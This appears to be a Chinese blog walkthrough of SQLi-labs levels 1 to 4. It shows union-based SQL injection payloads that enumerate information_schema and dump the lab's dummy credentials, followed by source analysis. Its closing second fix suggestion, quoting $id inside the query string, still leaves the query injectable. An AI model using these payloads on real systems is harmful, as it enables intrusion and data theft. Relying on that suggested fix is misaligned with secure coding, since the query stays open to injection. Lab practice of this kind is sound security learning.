SQL-lab靶场less1-4

前情提要：搭建sql-lab本地靶场的时候发现一些致命的报错：

这个程序只能在php 5.x上运行，在php 7及更高版本上，函数“mysql_query”和一些相关函数被删除，而不是“mysqli_query”。某些函数中的“MySQL”被替换为“MySQLi

其中一个原因就是旧版的靶场PHP环境是5.0版本的，而目前小皮面板更新到了8.0版本，配套的PHP环境是7.0。那么解决思路就两种，1：给sql-lab的PHP升级；2：小皮面板改成5.0版本的PHP环境。这里选择第一种解决方案

参考博客：

关于搭建SqliLabs中遇到的问题-CSDN博客

phpstudy v8.1在php7以上版本安装sqli-labs相关配置过程-CSDN博客

数据库结构简单小结：

mysql数据库5.0以上版本有一个自带的数据库叫做information_schema

该数据库下面有两个表一个是tables和columns

tables这个表的table_name字段下面是所有数据库存在的表名

table_schema字段下是所有表名对应的数据库名

columns这个表的colum_name字段下是所有数据库存在的字段名

columns_schema字段下是所有表名对应的数据库

常见语句记忆：

Less-1 **Error Based- String** 基于字符串的报错注入

根据页面显示，提示我们搭配id传一个值

Please input the ID as parameter with numeric value

输入?id=1 回显

输入?id=2时，页面内容改变

说明这个网站应该会通过id参数进行数据库查询，也就是说id只是一个将1传入数据库的”媒介“，数据库真正需要处理的是1。

那么数据库能够处理的究竟是字符串1还是整数1，这是一个有待验证的问题。测试：?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

报错警告我们语法有问题

双引号不报错，那就是单引号的存在使原本SQL语句包裹id=1的单引号没有闭合，破坏了查询语句结构。还知道了一点：错误出现在第1行的末尾，即在“1”LIMIT 0,1'附近。相当于提示我们原有的SQL语句的组成，可以推测一下：

SELECT * FROM users WHERE () LIMIT 0,1;

WHERE子句：WHERE子句用于过滤记录，必须在其后面提供一个条件表达式。例如，WHERE id = 1。

LIMIT子句：LIMIT 1表示只返回结果集中的第一行数据。

使用注释符，测试：?id=1' --+ 。没有发生报错，正是因为注释了后面的LIMIT 0,1;

知道了基本注入方式，就可以通过其他操作符得到我想要的信息了

1，order by查询当前数据表有多少列 ?id=1 ' order by 1,2,3 --+

正常回显没有报错

2，增加猜测列数：?id=1 'order by 1,2,3,4 --+

Unknown column '4' in 'order clause'

发生报错，第4列不存在，但是第3列能正常回显，说明数据表有三列

接下来就需要判断回显点（回显点是指SQL查询结果显示在页面上的位置，有回显点的SQL注入叫做回显点注入。通过回显点，攻击者可以观察到SQL查询的结果，从而推断出数据库的结构和内容），而很明显该靶场存在两个回显点。那么还要分别表格哪一列在页面显示的

?id=-1'union select 1,2,3--+

1. ?id=-1：这部分看起来像是试图将一个查询参数设置为 -1，这通常是SQL注入攻击中的一种常见技巧，用于绕过原始查询的条件。
2. 'union select 1,2,3--+：这部分是典型的联合查询语法。union 关键字用于合并两个或多个 SELECT 语句的结果集。select 1,2,3 是一个简单的示例查询，它选择常数列 1, 2, 和 3

语句要求回显1,2,3列，结果回显了2,3。说明第二列和第三列的数据是回显点。

通过函数查询数据库名和版本号：

?id=-1'union select 1,database(),version()--+

通过group_concat()函数爆出表名

GROUP_CONCAT() 是 MySQL 中的一个聚合函数，用于将分组中的字符串值连接成一个单一的字符串

GROUP_CONCAT([DISTINCT] expr [ORDER BY {unsigned_integer | col_name | expr} [ASC | DESC] [, ...]] [SEPARATOR str_val])

• DISTINCT：可选参数，用于去除结果中的重复值。
• expr：要连接的列或表达式。
• ORDER BY：可选参数，用于指定连接顺序。
• SEPARATOR：可选参数，用于指定连接字符串之间的分隔符，默认为逗号 ,

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

• group_concat(table_name) 将查询到的 information_schema.tables 表中的 table_name 字段的值进行连接。这里的 information_schema 是MySQL自带的信息数据库，其中的 tables 表存储了数据库的库名以及各个数据库中的表名
• 整个语句将筛选出名为 security 的数据库中的所有表名

结果：emails,referers,uagents,users

爆破字段名：

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

• information_schema.columns 表，这个表存储了数据库中各个表的列信息

爆破结果：CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password

可以看到成功爆出来username,password字段

爆破出username,password的数据：

?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

源码：SELECT * FROM users WHERE id='$id' LIMIT 0,1

Less-2 **Error Based- Intiger** 基于整数的报错注入

1，还是搭配id传一个值

由此确定页面正常回显的的标志，再判断整数还是字符串型注入：?id=1'

看到报错，再加双引号测试：?id=1"

仍然报错，说明原本的查询语句没有单双引号闭合，处理参数1数值类型是整数，是整数型注入

2，order by操作符判断数据表有几列：?id=1 order by 1,2,3 --+

?id=1 order by 1,2,3,4 --+

可以判断出该时间表有3列

3，接下来通过union判断回显点，?id=-1 union select 1,2,3 --+

由此得知回显点仅存在于查询的第2，3列上

4，使用操作符和函数爆出数据库名：

?id=-1 union select 1,2,database()--+

数据库名：security，group_concat()函数security所有数据表名：

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆出users数据表所有的列名:

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

最后就可以输出username,password信息了：

?id=-1 union select 1,group_concat(username),group_concat(password) from users--+

YourLogin :name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

源码分析：SELECT * FROM users WHERE id=$id LIMIT 0,1

• 构造了一个SQL查询语句SELECT * FROM users WHERE id=$id LIMIT 0,1;，用于从users表中根据id查询一条记录。
• 使用mysqli_query执行查询，并将结果存储在$result中

查询语句和less1其实差不多，少了单引号对id的闭合包裹

WHERE id=-1: 这是一个条件子句，指定了只有当ID列的值等于-1时，对应的记录才会被选中。原数据表根本没有id=-1的序列，所以后续攻击语句都是?id=-1作为开头

SQL中的ID概念

在SQL（Structured Query Language）中，ID通常指的是数据库表中的一个特殊类型的列，用于唯一标识表中的每一行记录。这种列也被称为主键（Primary Key）。主键的主要目的是确保表中的每一行都可以被唯一地识别和访问。在设计数据库时，选择一个合适的ID字段对于数据的管理和检索至关重要3。

ID的特性

ID字段通常具有以下特性：

1. 唯一性：每个ID值必须是唯一的，以确保每行记录都能被准确无误地找到。
2. 不可变性：一旦分配给某一行，ID值不应该改变，因为这可能会导致与其他依赖于该ID的数据库操作产生冲突。
3. 顺序性：虽然不是必需的，但在某些情况下，ID值可能是按某种顺序（如递增）分配的，这有助于维护数据的时间顺序或逻辑顺序。

ID的常见用途

ID字段在数据库操作中有着广泛的应用，包括但不限于：

• 关联数据：通过ID，可以在不同的表之间建立关系，实现数据的关联查询。例如，一个订单表可能有一个产品ID字段，用于关联到产品表中的具体产品记录。
• 数据检索：可以通过ID快速定位和检索特定的记录。例如，SELECT * FROM users WHERE id = 1 这样的SQL语句可以用来获取ID为1的用户信息。
• 更新和删除：ID也是更新或删除特定记录时的关键依据。例如，DELETE FROM users WHERE id = 1 可以用来删除ID为1的用户记录。

自动增长ID

在许多现代数据库系统中，支持为ID字段设置自动增长属性。这意味着每当新记录插入到表中时，数据库会自动为该记录分配一个新的、唯一的ID值。这通常通过数据库内部的计数器机制实现。例如，在MySQL中，可以使用AUTO_INCREMENT关键字来定义自动增长的ID字段6。

Less-3 Error Based- String (with Twist)基于字符串的报错注入（转义）

1，第一步还是判断什么类型的注入：?id=1

能够正常回显，再测试：?id=1'  产生报错

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

再测试：?id=1" 能够正常回显。说明单引号会破坏查询语句原有单引号的闭合结构，可以断定这是一个字符型注入

2，order by判断当前数据表的列数：?id=1') order by 1,2,3--+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1,2,3-- ') LIMIT 0,1' at line 1

还是发生了报错，通过报错信息我们知道了真正的闭合方式是')。修改payload：

?id=1') order by 1,2,3--+ 正常回显

依次递归判断：?id=1') order by 1,2,3,4--+

报错说不存在第4列，那么数据表就只有3列

3，union操作符判断注入点：?id=-1') union select 1,2,3--+

回显还是2，3列

4，爆破数据库名：?id=-1') union select 1,2,database()--+

Your Password:security

配合group_concat()函数爆破出当前数据库所有数据表名：

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =database()--+

查看users数据表里面的所有列名：

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

最后再爆出用户名和密码：

?id=-1') union select 1,group_concat(username),group_concat(password) from users--+

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

源码分析：SELECT * FROM users WHERE id=('$id') LIMIT 0,1

其实和less1的查询语句是一样的，只不过多了括号闭合

Less-4 Error Based- DoubleQuotes String

基于双引号的报错注入

1，id传一个值判断注入类型：?id=1'

正常回显页面，再拼接双引号传入一个值：?id=1"

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

发生报错，说明双引号会破坏原有查询语句的结构，由此判断注入类型是双引号，而参数又需要使用引号包裹，所以是字符串类型。还有一点，根据报错提示，推断正确的闭合方式应该是：("")

2，order by判断有该数据表有多少列，先猜测三列

?id=1") order by 1,2,3--+

回显是正常的，证明至少有三列，再判断是否有四列：?id=1") order by 1,2,3,4--+

发生报错，推断数据表只有3列

3，union判断回显点：?id=-1") union select 1,2,3--+

只会回显点是2，3列

4，爆破数据库名：?id=-1") union select 1,2,database()--+

爆破出数据表名：?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆破users表所有列名：?id=1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and

table_schema=database()--+

再爆破出所有的用户名和密码：?id=-1") union select 1,group_concat(username),group_concat(password) from users--+

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

select * from user where id=1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

select * from user where id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

输出结果的区别

查询目的：这两个SQL查询的目的是利用SQL注入技术来获取数据库中users表的列名信息。

查询结构：两个查询都使用了UNION操作符来合并两个SELECT语句的结果集。第一个查询的条件是id=1，而第二个查询的条件是id=-1。

输出结果的区别

1. 第一个查询 (id=1):
   • 如果user表中存在id=1的记录，那么查询会首先返回该记录。
   • 然后，UNION操作符会将第二个SELECT语句的结果（即从information_schema.columns 表中获取的列名信息）追加到结果集中。
   • 最终输出结果将包含user表中id=1的记录以及users表的列名信息。
2. 第二个查询 (id=-1):
   • 由于user表中通常不会有id=-1的记录，第一个SELECT语句将不会返回任何记录。
   • 因此，UNION操作符的结果将仅包含第二个SELECT语句的结果，即users表的列名信息。
   • 最终输出结果将只包含users表的列名信息。

分析源码：

$id = '"' . $id . '"';

这行代码的作用是将 $id 变量的值用双引号包裹起来。例如，如果 $id 的值是 123，那么执行这行代码后，$id 的值将变为 "123"

"SELECT * FROM users WHERE id=($id) LIMIT 0,1";

本质上less1,2,3,4的查询语句是一样的，无非是对传入参数的闭合拼接方式不同

改进建议：

1. 使用预处理语句： 为了防止SQL注入，建议使用预处理语句（Prepared Statements）。例如：
   $stmt = $pdo->prepare('SELECT * FROM users WHERE id = ? LIMIT 0,1');
   $stmt->execute([$id]);
2. 简化字符串操作： 如果确实需要将 $id 用双引号包裹起来，可以考虑在SQL查询中直接使用双引号，而不是在PHP代码中进行字符串拼接。例如：
   $sql = "SELECT * FROM users WHERE id=\"$id\" LIMIT 0,1";